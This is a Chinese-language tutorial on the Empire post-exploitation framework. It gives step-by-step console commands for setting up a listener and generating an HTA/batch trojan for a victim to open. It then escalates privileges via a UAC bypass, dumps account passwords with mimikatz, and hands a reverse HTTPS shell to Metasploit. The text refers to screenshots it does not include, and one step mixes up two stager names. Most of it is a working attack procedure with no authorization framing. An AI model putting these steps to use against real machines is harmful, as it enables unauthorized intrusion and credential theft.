後滲透工具Empire使用教程
一、前言
Empire是一個PowerShell後期漏洞利用代理工具同時也是一款很強大的後滲透測神器,它建立在密碼學、安全通訊和靈活的架構之上。Empire實現了無需powershell.exe就可執行PowerShell代理的功能。快速部署後期漏洞利用模組,從鍵盤記錄器到Mimikatz,並且能夠適應通訊躲避網路檢測,所有的這些功能都封裝在一個以實用性為重點的框架中
二、empire使用詳解
1.Empire 的安裝
git clone https://github.com/EmpireProject/Empire.git
unzip Empire-master.zip
cd Empire-master
cd setup/
./install.sh
(最後輸入資料庫密碼)
2.設定監聽
cd Empire-master
./empire
(Empire) > help #主選單幫助命令
(Empire) > listeners #檢視本地監聽代理地址,現在還沒有會話代理,所以為空
進入後需要使用監聽種類,輸入 uselistener 加空格然後兩下 tab 可列出所有的可使用監聽類,這裡我們使用 http
(Empire: listeners) > info #列出詳細資訊
(Empire: listeners) > set Name bk #設定Name為bk
(Empire: listeners) > execute #執行命令,這條命令將其name設定生效
至此,監聽工作完成。我們開始配置生成後門。
3、生成木馬
設定好監聽後通過 back 命令返回上一級,然後使用 usestager 命令來指定生成木馬的型別,通過空格加兩下 tab 可檢視所有生成檔案的型別,這裡我們使用 windows/hta,即 windows 平臺下的 hta檔案,同樣,通過 info 檢視此模組的詳細資訊。
(Empire: listeners/http) > back #返回上層模組
(Empire: listeners/http) > usestager #空格加兩下tab
生成的檔案型別大體有三類,multi 開頭的是通用類,osx 開頭即 mac 使用,windows 即 win 平臺使用。
(Empire: listeners) > usestager windows/launcher_bat bk # 選擇木馬種類
這裡選擇的是hta型別的指令碼,當然也可以選擇其他的。後面的bk就是剛剛設定的監聽,這個模組就是依據監聽的配置資訊,生成相應的木馬,讓反彈馬找到連線主機。
(Empire: stager/windows/launcher_bat) > info #檢視需要配置的引數資訊
(Empire: stager/windows/hta > execute #執行生成木馬
將程式碼儲存為hta檔案,放到伺服器上。
在目標機器上訪問
執行命令後,我們回到我們的機器可以看到已經獲取到了客戶端的一個會話
(Empire: stager/windows/launcher_bat) > agents #檢視獲取的代理會話
一個會話已經建立完成。
(Empire: agents) > rename DPFXWKY9 win10 #更改會話名字
(Empire: agents) > interact win10 #和該會話互動
我們通過 help 可檢視一些命令和一些提供的內網滲透常用的工具
4、提權
如果想執行 windows 系統自帶的命令,可以通過 shell 加命令的格式,例如檢視當前 shell 的許可權,我們輸入 shell whoami /groups,返回了 medium 即非高許可權,如下圖:
非高許可權的話,很多命令使用會有限制,例如 mimikatz,所以下面需要提升許可權,這裡我們使用 bypassuac,首先 empire 提供了很多使用模組,這裡我們通過 usemodule 空格加兩下 tab 可檢視全部模組,有二百多個,如下圖:
bypassuac 提權我們使用 usemodule privesc/bypassuac 這個模組,然後 info 檢視其資訊,如下圖:
這裡我們需要設定的引數還是 Listener,即監聽的名稱,這裡是 bk,如下圖:
設定後通過 execute 執行,成功後會返回一個新的 shell
隨後我們通過 agents 檢視已有的 shell,username 前帶 * 號的就是高許可權已經提權成功的 shell。
這時 mimikatz 已可以使用,輸入 mimikatz 來獲取目標賬號密碼,如下圖:
通過 mimikatz 獲取後,若在內網機器較多,為了檢視方便,我們可以通過 creds 命令來直接列出其密碼,如下圖:
5、反彈shell給msf
empire 若需要結合 msf 使用,則可以將得到的 shell 反給 msf,使用模組 code_execution/invoke_shellcode,info 資訊如下:
這裡需要設定下Lhost 和Lport,Lhost 即 msf 所在機器的 ip,Lport 即 msf 監聽反彈 shell 的埠,還有一個引數注意下,就是payload,預設值是 reverse_https,這個不用改,我們 msf 設定監聽時 payload 需要和其一致,也需要設定成 reverse_https,設定後我們先不執行 execute 命令,先把 msf 監聽設定好:
msf 的 payload 設定為 windows/meterpreter/reverse_https,Lhost 為本機所在的 ip,Lport 埠和剛才 empire 設定的一樣,這裡是 4444,然後 exploit 執行監聽,這時返回 empire 執行 execute,停一會會看到 msf 已經收到了 shell,如下圖:
返回 shell 後,我們可以執行 whoami /groups 看下許可權,可以看到返回的是高許可權的 shell,如下圖:
